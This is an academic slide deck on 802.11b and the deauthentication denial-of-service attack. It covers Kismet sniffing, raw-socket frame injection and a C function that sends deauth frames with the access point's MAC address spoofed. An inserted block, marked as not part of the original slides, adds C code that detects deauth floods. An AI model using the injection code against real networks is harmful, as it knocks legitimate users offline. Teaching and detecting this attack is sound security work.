802.11 Attack Demo PowerPoint PPT Presentation


802.11 Attack Demo

Haobo Zhou

([email protected])

LIACS

http://www.liacs.nl/home/hzhou


What Will Be Covered

  • Overview of 802.11b

  • Wireless network sniffer

  • Frame Injection

  • Deauth/Disassociation Attack

  • Attack Demo


ISO OSI Model and 802.11b

Overview of 802.11b

Obtained From http://alpha.fdu.edu/~kanoksri/IEEE80211b.html


Overview of 802.11b

  • Runs in the 2.4 GHz band

    • DSSS - Direct Sequence Spread Spectrum

    • Channels

      • FCC (US) - 11 Channels (1-11)

      • ETSI (EU) - 13 Channels (1-13)

      • France - 4 Channels (10-13)

      • Japan - 14 Channels (1-14)

    • Uses CSMA/CA


Overview of 802.11b

  • Uses WEP for Encryption

    • “Wired Equivalent Privacy”

    • Uses RC4

    • 40-bit or 104-bit static key with 24-bit IV


Overview of 802.11b

  • Consists of 3 main protocol types

    • Management

    • Control

    • Data


Overview of 802.11b

Ad hoc


Overview of 802.11b

Infrastructure


Overview of 802.11b

[Diagram: message sequence between Node and Access Point: Beacon, Authentication Req, Authentication Resp, Association Req, Association Resp. Access Point accepts Node; Node is Associated.]


Wireless network sniffer

Wireless network detection

  • NIC with monitor mode support

    • Why?

      • Management frames

      • Frames that belong to others

  • Tools

    • Kismet

    • others


Wireless network sniffer

Network Interface Card Modes

  • Managed (Infrastructure)

  • Ad-Hoc (Ad hoc)

  • Monitor (hardware support?)

  • Master (acts as an AP)


Wireless network sniffer

  • KISMET

    • An 802.11 layer2 wireless network sniffer

    • Runs on Linux

    • Ethereal/Tcpdump compatible data logging

    • Over 20 supported card types

    • Open source code


Kismet


Frame Injection

  • NIC

    • support ?

  • Device Driver

    • support frame injection?

      • Yes: very good

      • No: change it!

  • User program


Frame Injection

  • User program

    • C code on Linux

    • Raw socket programming

      • Use the PF_PACKET interface to access the link layer

      • sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));


Deauthentication Attack

  • Management frames can control link characteristics and physical medium properties

  • 802.11b management frames are NOT authenticated

    • Why is this bad?


Deauthentication Attack

  • Denial of Service – De-authentication

    • Use MAC address of Access Point

    • Send deauthenticate frames

      • Send continuously

    • Users are unable to reassociate with AP


Deauthentication Attack

[Diagram: 802.11 state machine]

  • State 1: Unauthenticated, Unassociated

  • State 2: Authenticated, Unassociated

  • State 3: Authenticated, Associated

  • Transitions: Successful authentication, Successful association, Disassociation, Deauthentication


Deauthentication Attack

[Figure: deauth frame structure]

  • Attacker must spoof AP MAC address in Src Addr and BSSID

  • Sequence Control field handled by firmware (not set by attacker)


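Deauthentication Attack

    #include <string.h>       /* memset, memcpy */
    #include <sys/socket.h>   /* send */
    #include <linux/types.h>  /* __u8, __u16 */

    /* struct a3_80211, FC_TYPE_MGT and MGT_DEAUTH come from a header not shown
     * on the slide; sd is the PF_PACKET socket opened earlier. */
    void send_deauth(__u8 *dst, __u8 *bssid)
    {
        struct {
            struct a3_80211 hdr;
            __u16 reason;
        } mgt_frame;

        memset(&mgt_frame, 0, sizeof(mgt_frame));
        mgt_frame.hdr.mh_type = FC_TYPE_MGT;
        mgt_frame.hdr.mh_subtype = MGT_DEAUTH;
        memcpy(&(mgt_frame.hdr.mh_mac1), dst, 6);    /* Address 1: destination */
        memcpy(&(mgt_frame.hdr.mh_mac2), bssid, 6);  /* Address 2: source = AP MAC */
        memcpy(&(mgt_frame.hdr.mh_mac3), bssid, 6);  /* Address 3: BSSID */
        mgt_frame.reason = 2;  /* reason code 2: previous authentication no longer valid */
        send(sd, &mgt_frame, sizeof(mgt_frame), 0);
    }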
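Added example, not part of the original slides: since deauthentication frames carry no authentication, a monitor-mode sensor has to spot the flood by rate, so this C code parses the header fields named above and counts deauth/disassociation frames per BSSID in a sliding window. The function names, the 1-second window, the threshold of 5 and the sample MAC address are assumptions, and frames are assumed to arrive with any capture header already stripped.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WINDOW_MS 1000  /* assumed sliding window */
#define THRESHOLD 5     /* assumed max deauth/disassoc frames per window */
/* addr[0] = destination, addr[1] = source, addr[2] = BSSID */
struct deauth_info { uint8_t addr[3][6]; uint16_t reason; int subtype; };
struct flood_state { uint8_t bssid[6]; uint32_t ts[THRESHOLD + 1]; int n; };

/* Constructed sample: deauth (subtype 12), broadcast destination, reason 2. */
static const uint8_t SAMPLE_DEAUTH[26] = {
    0xC0, 0x00, 0x00, 0x00,                 /* frame control, duration */
    0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,     /* address 1: destination */
    0x00, 0x11, 0x22, 0x33, 0x44, 0x55,     /* address 2: source (claimed AP) */
    0x00, 0x11, 0x22, 0x33, 0x44, 0x55,     /* address 3: BSSID */
    0x10, 0x00, 0x02, 0x00 };               /* sequence control, reason code */

/* Parse a bare 802.11 frame; returns 1 for deauth/disassoc frames, else 0. */
int parse_deauth(const uint8_t *f, size_t len, struct deauth_info *out) {
    if (len < 26) return 0;                 /* 24-byte header + 2-byte reason */
    int type = (f[0] >> 2) & 0x3, subtype = (f[0] >> 4) & 0xF;
    if (type != 0 || (subtype != 12 && subtype != 10)) return 0;
    memcpy(out->addr, f + 4, 18);           /* three consecutive 6-byte addresses */
    out->reason = (uint16_t)(f[24] | (f[25] << 8));   /* little-endian */
    out->subtype = subtype;
    return 1;
}

/* Returns 1 once more than THRESHOLD matching frames fall inside WINDOW_MS. */
int flood_check(struct flood_state *s, const uint8_t *f, size_t len, uint32_t now_ms) {
    struct deauth_info d;
    int keep = 0;
    if (!parse_deauth(f, len, &d) || memcmp(d.addr[2], s->bssid, 6) != 0) return 0;
    for (int i = 0; i < s->n; i++)          /* forget timestamps outside the window */
        if (now_ms - s->ts[i] < WINDOW_MS) s->ts[keep++] = s->ts[i];
    if (keep > THRESHOLD)                   /* buffer full: drop the oldest entry */
        memmove(s->ts, s->ts + 1, (size_t)(--keep) * sizeof s->ts[0]);
    s->ts[keep++] = now_ms;
    s->n = keep;
    return s->n > THRESHOLD;
}

int main(void) {
    struct flood_state s = { {0x00, 0x11, 0x22, 0x33, 0x44, 0x55}, {0}, 0 };
    for (uint32_t t = 0; t < 1000; t += 100)   /* constructed: 10 frames per second */
        if (flood_check(&s, SAMPLE_DEAUTH, sizeof SAMPLE_DEAUTH, t))
            printf("t=%u ms: deauth flood on monitored BSSID\n", (unsigned)t);
    return 0;
}
```

A single deauth frame is normal when a station leaves, which is why the check is rate-based rather than per-frame.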


Question?

deauth-attack demo continues


802.11 Deauth-attack DEMO

Attacker

  • Hardware

    • Laptop

    • Wireless card

      • Atheros 5212 chip

      • Monitor mode support

  • Software

    • Device driver

      • Madwifi

      • Open source project

      • Two patches to enable frame injection

    • User program

      • Fata_jace.c

Victim

  • Hardware

    • Laptop

    • Wireless card

  • Software

    • Ping

      • Use ping to verify the connection


Thanks

  • Xu Li

  • Wei Wang

  • Google

